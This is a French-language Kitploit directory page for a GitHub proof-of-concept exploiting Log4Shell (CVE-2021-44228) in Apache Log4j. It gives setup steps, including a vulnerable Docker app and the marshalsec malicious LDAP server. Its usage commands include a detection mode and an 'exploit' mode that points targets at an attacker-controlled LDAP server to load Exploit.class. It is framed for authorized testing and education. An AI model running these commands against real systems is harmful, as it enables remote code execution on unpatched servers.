Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Log4Shell — Log4Shell CVE-2021-44228 PoC | Kitploit
Outils/GitHubGitHub/moften/log4shell
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubmoften/log4shell

Log4Shell

Log4Shell CVE-2021-44228 PoC

Voir le dépôt
1il y a 11 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Log4Shell

(CVE-2021-44228)

☠️ Log4Shell PoC (CVE-2021-44228)

Exploit de test pour la vulnérabilité critique Log4Shell dans Apache Log4j ≤ 2.14.1, permettant l'exécution de code à distance via des injections JNDI.

⚠️ Ce PoC est uniquement destiné à des fins éducatives et à des tests contrôlés dans des environnements autorisés. Ne l'utilisez pas contre des systèmes sans autorisation explicite.


Prérequis

  • Python 3.x
  • Java 8 ou supérieur
  • marshalsec (pour le serveur LDAP malveillant)
  • Serveur HTTP (par exemple, python3 -m http.server)
  • Docker (facultatif pour environnement vulnérable)

Environnement de test local (facultatif avec Docker)

  1. Exécutez l'application vulnérable :

    root@kitploit:~
    docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
    
  2. Accédez à : http://localhost:8080

root@kitploit:~
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests

Utilisation

Mode de détection passive :

root@kitploit:~
python3 main.py -u http://target.com -i burp.collab.net -m detect

Mode intrusif (nécessite Exploit.class sur votre serveur HTTP) :

root@kitploit:~
python3 main.py -u http://target.com -i 192.168.0.100:1389 -m exploit

Télécharger l’outil